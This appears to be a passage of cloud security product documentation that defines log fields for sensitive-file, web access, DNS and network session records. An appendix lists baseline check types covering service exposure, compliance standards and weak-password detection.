Sensitive file fields
Field name | Description | Example |
alert_level | Risk level. Valid values:
| high |
rule_name | File type name. | ionic token |
file_path | Sensitive file path. | /Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
result | Check result. | {"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
Appendix
Baseline types and subtypes
Type | Subtype | Description |
hc_exploit | hc_exploit_redis | High risk exploit-Redis unauthorized access high exploit vulnerability risk |
hc_exploit_activemq | High risk exploit-ActiveMQ unauthorized access high exploit vulnerability risk | |
hc_exploit_couchdb | High risk exploit - CouchDB unauthorized access high exploit risk | |
hc_exploit_docker | High risk exploit - Docker unauthorized access high vulnerability risk | |
hc_exploit_es | High risk exploit - Elasticsearch unauthorized access high exploit vulnerability risk | |
hc_exploit_hadoop | High risk exploit - Hadoop unauthorized access high exploit vulnerability risk | |
hc_exploit_jboss | High risk exploit - Jboss unauthorized access high exploit vulnerability risk | |
hc_exploit_jenkins | High risk exploit - Jenkins unauthorized access high exploit vulnerability risk | |
hc_exploit_k8s_api | High risk exploit - Kubernetes Apiserver unauthorized access high exploit vulnerability risk | |
hc_exploit_ldap | High risk exploit - LDAP unauthorized access high exploit vulnerability risk (Windows) | |
hc_exploit_ldap_linux | High risk exploit-OpenLDAP unauthorized access vulnerability baseline (Linux) | |
hc_exploit_memcache | High risk exploit - Memcached unauthorized access high exploit vulnerability risk | |
hc_exploit_mongo | High risk exploit - Mongodb unauthorized access high exploit vulnerability risk | |
hc_exploit_pgsql | High risk exploit-Postgresql unauthorized access to high-risk risk baseline | |
hc_exploit_rabbitmq | High risk exploit-RabbitMQ unauthorized access high exploit vulnerability risk | |
hc_exploit_rsync | High risk exploit - rsync unauthorized access high exploit vulnerability risk | |
hc_exploit_tomcat | High risk exploit - Apache Tomcat AJP File Read/Inclusion Vulnerability | |
hc_exploit_zookeeper | High risk exploit - ZooKeeper unauthorized access high exploit vulnerability risk | |
hc_container | hc_docker | Alibaba Cloud Standard - Docker Security Baseline Check |
hc_middleware_ack_master | Kubernetes(ACK) Master Internationally Agreed Best Practices for Security | |
hc_middleware_ack_node | Kubernetes(ACK) Node Internationally Agreed Best Practices for Security | |
hc_middleware_k8s | Alibaba Cloud Standard-Kubernetes-Master security baseline check | |
hc_middleware_k8s_node | Alibaba Cloud Standard-Kubernetes-Node security baseline check | |
cis | hc_suse 15_djbh | SUSE Linux 15 Baseline for China classified protection of cybersecurity-Level III |
hc_aliyun_linux3_djbh_l3 | Alibaba Cloud Linux 3 Baseline for China classified protection of cybersecurity-Level III | |
hc_aliyun_linux_djbh_l3 | Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level III | |
hc_bind_djbh | China's Level 3 Protection of Cybersecurity - Bind Compliance Baseline Check | |
hc_centos 6_djbh_l3 | CentOS Linux 6 Baseline for China classified protection of cybersecurity-Level III | |
hc_centos 7_djbh_l3 | CentOS Linux 7 Baseline for China classified protection of cybersecurity-Level III | |
hc_centos 8_djbh_l3 | CentOS Linux 8 Baseline for China classified protection of cybersecurity - Level III | |
hc_debian_djbh_l3 | Debian Linux 8/9/10 Baseline for China classified protection of cybersecurity-Level III | |
hc_iis_djbh | IIS Baseline for China classified protection of cybersecurity-Level III | |
hc_informix_djbh | China's Level 3 Protection of Cybersecurity - Informix Compliance Baseline Check | |
hc_jboss_djbh | China's Level 3 Protection of Cybersecurity - Jboss6/7 Compliance Baseline Check | |
hc_mongo_djbh | MongoDB Baseline for China classified protection of cybersecurity-Level III | |
hc_mssql_djbh | China's Level 3 Protection of Cybersecurity -SQL Server Compliance Baseline Check | |
hc_mysql_djbh | Equal Guarantee Level 3-MySql Compliance Baseline Check | |
hc_nginx_djbh | Equal Guarantee Level 3-Nginx Compliance Baseline Check | |
hc_oracle_djbh | China's Level 3 Protection of Cybersecurity - Oracle Compliance Baseline Check | |
hc_pgsql_djbh | Level 3-PostgreSql compliance baseline check | |
hc_redhat 6_djbh_l3 | China's Level 3 Protection of Cybersecurity - Red Hat Enterprise Linux 6 Compliance Baseline Check | |
hc_redhat_djbh_l3 | China's Level 3 Protection of Cybersecurity - Red Hat Enterprise Linux 7 Compliance Baseline Check | |
hc_redis_djbh | Redis Baseline for China classified protection of cybersecurity-Level III | |
hc_suse 10_djbh_l3 | SUSE Linux 10 Baseline for China classified protection of cybersecurity-Level III | |
hc_suse 12_djbh_l3 | SUSE Linux 12 Baseline for China classified protection of cybersecurity-Level III | |
hc_suse_djbh_l3 | SUSE Linux 11 Baseline for China classified protection of cybersecurity-Level III | |
hc_ubuntu 14_djbh_l3 | Ubuntu 14 Baseline for China classified protection of cybersecurity-Level III | |
hc_ubuntu_djbh_l3 | Waiting for Level 3-Ubuntu 16/18/20 compliance regulations inspection | |
hc_was_djbh | China's Level 3 Protection of Cybersecurity - Websphere Application Server Compliance Baseline Check | |
hc_weblogic_djbh | Weblogic Baseline for China classified protection of cybersecurity-Level III | |
hc_win 2008_djbh_l3 | China's Level 3 Protection of Cybersecurity - Windows Server 2008 R2 Compliance Baseline Check | |
hc_win 2012_djbh_l3 | Windows 2012 R2 Baseline for China classified protection of cybersecurity-Level III | |
hc_win 2016_djbh_l3 | Windows 2016/2019 Baseline for China classified protection of cybersecurity-Level III | |
hc_aliyun_linux_djbh_l2 | Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level II | |
hc_centos 6_djbh_l2 | CentOS Linux 6 Baseline for China classified protection of cybersecurity-Level II | |
hc_centos 7_djbh_l2 | CentOS Linux 7 Baseline for China classified protection of cybersecurity-Level II | |
hc_debian_djbh_l2 | Debian Linux 8 Baseline for China classified protection of cybersecurity-Level II | |
hc_redhat 7_djbh_l2 | Redhat Linux 7 Baseline for China classified protection of cybersecurity-Level II | |
hc_ubuntu_djbh_l2 | Linux Ubuntu 16/18 Baseline for China classified protection of cybersecurity-Level II | |
hc_win 2008_djbh_l2 | Windows 2008 R2 Baseline for China classified protection of cybersecurity-Level II | |
hc_win 2012_djbh_l2 | Windows 2012 R2 Baseline for China classified protection of cybersecurity-Level II | |
hc_win 2016_djbh_l2 | Windows 2016/2019 Baseline for China classified protection of cybersecurity-Level II | |
hc_aliyun_linux_cis | Alibaba Cloud Linux 2 Internationally Agreed Best Practices for Security | |
hc_centos 6_cis_rules | CentOS Linux 6 LTS Internationally Agreed Best Practices for Security | |
hc_centos 7_cis_rules | CentOS Linux 7 LTS Internationally Agreed Best Practices for Security | |
hc_centos 8_cis_rules | CentOS Linux 8 LTS Internationally Agreed Best Practices for Security | |
hc_debian 8_cis_rules | Debian Linux 8 Internationally Agreed Best Practices for Security | |
hc_ubuntu 14_cis_rules | Ubuntu 14 LTS Internationally Agreed Best Practices for Security | |
hc_ubuntu 16_cis_rules | Ubuntu 16/18/20 LTS Internationally Agreed Best Practices for Security | |
hc_win 2008_cis_rules | Windows Server 2008 R2 Internationally Agreed Best Practices for Security | |
hc_win 2012_cis_rules | Windows Server 2012 R2 Internationally Agreed Best Practices for Security | |
hc_win 2016_cis_rules | Windows Server 2016/2019 R2 Internationally Agreed Best Practices for Security | |
hc_kylin_djbh_l3 | China's Level 3 Protection of Cybersecurity - Kylin Compliance Baseline Check | |
hc_uos_djbh_l3 | China's Level 3 Protection of Cybersecurity - uos Compliance Baseline Check | |
hc_best_security | hc_aliyun_linux | Alibaba Cloud Linux/Aliyun Linux 2 Benchmark |
hc_centos 6 | Alibaba Cloud Standard - CentOS Linux 6 Security Baseline Check | |
hc_centos 7 | Alibaba Cloud Standard - CentOS Linux 7/8 Security Baseline Check | |
hc_debian | Alibaba Cloud Standard - Debian Linux 8/9/10 Security Baseline | |
hc_redhat 6 | Alibaba Cloud Standard - Red Hat Enterprise Linux 6 Security Baseline Check | |
hc_redhat 7 | Alibaba Cloud Standard - Red Hat Enterprise Linux 7/8 Security Baseline Check | |
hc_ubuntu | Alibaba Cloud Standard - Ubuntu Security Baseline | |
hc_windows_2008 | Alibaba Cloud Standard - Windows Server 2008 R2 Security Baseline Check | |
hc_windows_2012 | Alibaba Cloud Standard - Windows 2012 R2 Security Baseline | |
hc_windows_2016 | Alibaba Cloud Standard - Windows 2016/2019 Security Baseline | |
hc_db_mssql | Alibaba Cloud Standard-SQL Server Security Baseline Check | |
hc_memcached_ali | Alibaba Cloud Standard - Memcached Security Baseline Check | |
hc_mongodb | Alibaba Cloud Standard - MongoDB version 3.x Security Baseline Check | |
hc_mysql_ali | Alibaba Cloud Standard - Mysql Security Baseline Check | |
hc_oracle | Alibaba Cloud Standard - Oracle 11g Security Baseline Check | |
hc_pgsql_ali | Alibaba Cloud Standard-PostgreSql Security Initialization Check | |
hc_redis_ali | Alibaba Cloud Standard - Redis Security Baseline Check | |
hc_apache | Alibaba Cloud Standard - Apache Security Baseline Check | |
hc_iis_8 | Alibaba Cloud Standard - IIS 8 Security Baseline Check | |
hc_nginx_linux | Alibaba Cloud Standard - Nginx Security Baseline Check | |
hc_suse 15 | Alibaba Cloud Standard - SUSE Linux 15 Security Baseline Check | |
tomcat 7 | Alibaba Cloud Standard-Apache Tomcat Security Baseline | |
weak_password | hc_mongodb_pwd | Weak Password-MongoDB Weak Password baseline(support version 2. X) |
hc_weakpwd_ftp_linux | Weak password - Ftp login weak password baseline | |
hc_weakpwd_linux_sys | Weak password - Linux system login weak password baseline | |
hc_weakpwd_mongodb 3 | Weak Password-MongoDB Weak Password baseline | |
hc_weakpwd_mssql | Weak password-SQL Server DB login weak password baseline | |
hc_weakpwd_mysql_linux | Weak password - Mysql DB login weak password baseline | |
hc_weakpwd_mysql_win | Weak password - Mysql DB login weak password baseline(Windows version) | |
hc_weakpwd_openldap | Weak password - Openldap login weak password baseline | |
hc_weakpwd_oracle | Weak Password-Oracle login weak password detection | |
hc_weakpwd_pgsql | Weak password - PostgreSQL DB login weak password baseline | |
hc_weakpwd_pptp | Weak password - pptpd login weak password baseline | |
hc_weakpwd_redis_linux | Weak password - Redis DB login weak password baseline | |
hc_weakpwd_rsync | Weak password - rsync login weak password baseline | |
hc_weakpwd_svn | Weak password - svn login weak password baseline | |
hc_weakpwd_tomcat_linux | Weak password - Apache Tomcat Console weak password baseline | |
hc_weakpwd_vnc | Weak password-VncServer weak password check | |
hc_weakpwd_weblogic | Weak password-Weblogic 12c login weak password detection | |
hc_weakpwd_win_sys | Weak password - Windows system login weak password baseline |
Network log fields
Web access logs
Field name | Description | Example |
response_content_length | The length of the message body. Unit: bytes. | 612 |
dst_ip | The IP address of the destination host. | 39.105.XX.XX |
dst_port | The port of the destination host. | 80 |
host | The IP address or domain name of the destination host. | 39.105.XX.XX |
jump_location | The redirection address. | 123 |
request_method | The HTTP request method. | GET |
http_referer | The HTTP referer. The field contains the URL of the web page that is linked to the resource being requested. | www.example.com |
request_datetime | The time when the request is initiated. | 2024-08-01 06:59:28 |
status | The HTTP status code. | 200 |
content_type | The type of the request content. | text/plain;charset=utf-8 |
response_content_type | The type of the response content. | text/plain; charset=utf-8 |
src_ip | The source IP address. | 31.220.XX.XX |
src_port | The source port. | 59524 |
request_uri | The request URI. | /report |
http_user_agent | The user agent that initiates the request. | okhttp/3.2.0 |
http_x_forward_for | The HTTP request header that records the originating IP address of the client. | 31.220.XX.XX |
DNS logs
Field name | Description | Example |
additional | The additional field that is returned by the DNS server and records information such as the CNAME record, MX record, and PTR record. | N/A |
additional_num | The number of additional records returned by the DNS server. | 0 |
answer | The DNS answer returned by the DNS server, which indicates the resolution results. A DNS answer contains the IP address to which the requested domain name is resolved or other information such as the A record and the AAAA record. | example.com A IN 52 1.2.XX.XX |
answer_num | The number of DNS answers. | 1 |
authority | The authority field returned by the DNS server. An authority is the DNS server that manages and resolves the domain name. An authority field contains information about a DNS server that provides the DNS record for the requested domain name, such as the NS record. | NS IN 17597 |
authority_num | The number of authorities. | 1 |
client_subnet | The subnet of the client. | 59.152.XX.XX |
dst_ip | The destination IP address. | 106.55.XX.XX |
dst_port | The destination port. | 53 |
net_connect_dir | The direction of data transmission. Valid values:
| out |
qid | The ID of the query. | 13551 |
query_name | The domain name that is queried. | example.com |
query_type | The type of the query. | A |
query_datetime | The time of the query. | 2024-08-01 08:33:58 |
rcode | The response code returned by the DNS server, which indicates the DNS resolution result. | 0 |
region | The ID of the source region. Valid values:
| 1 |
response_datetime | The response time of the DNS server. | 2024-08-01 08:31:25 |
src_ip | The source IP address. | 106.11.XX.XX |
src_port | The source port. | 22 |
Network session logs
Field name | Description | Example |
asset_type | The type of the asset from which the logs are collected. Valid values:
| ECS |
dst_ip | The destination IP address. | 119.96.XX.XX |
dst_port | The destination port. | 443 |
net_connect_dir | The direction of the session. The value is fixed as out.
| out |
l4_proto | The type of the protocol. Valid values:
| tcp |
session_time | The time when the session starts. | 2024-08-01 08:31:18 |
src_ip | The source IP address. | 121.40.XX.XX |
src_port | The source port. | 53602 |
Local DNS logs
Field name | Description | Example |
anwser_name | The name of the DNS answer, which indicates the domain name associated with the resource record. | example.com |
answer_rdata | The resource data area (RDA) field of the DNS answer, which indicates the specific value of the resolution result. | 106.11.XX.XX |
answer_ttl | The time to live (TTL) of the DNS answer. Unit: seconds. | 600 |
answer_type | The type of the DNS answer. Valid values:
| 1 |
dst_ip | The destination IP address. The value is a decimal IP address by default. | 323223**** |
dst_port | The destination port. | 53 |
group_id | The group ID. The same group ID indicates the same DNS request or response. | 3 |
host | The name of the host. | hostname |
id | The ID of the query, which identifies a DNS request or DNS response. | 64588 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address that is included in the DNS request or response. | 121.40.XX.XX |
ip_ttl | The TTL of the IP packet in the DNS request or response. | 64 |
query_name | The domain name that is queried. | example.com |
query_type | The type of the query. Valid values:
| 1 |
src_ip | The IP address from which the DNS request or response is initiated. The value is a decimal IP address by default. | 168427**** |
src_port | The number of the port from which the DNS request or response is initiated. | 53 |
start_time | The start timestamp, which indicates the time when the event occurs. Unit: seconds. | 1719472214 |
time_usecond | The timestamp of the DNS request or response. Unit: microseconds. | 590662 |
tunnel_id | The ID of the tunnel used by the DNS request or response. Tunneling is a way to transfer data by using different protocols. Tunneling can be used for secure access to the Internet or for communications across different networks. | 514763 |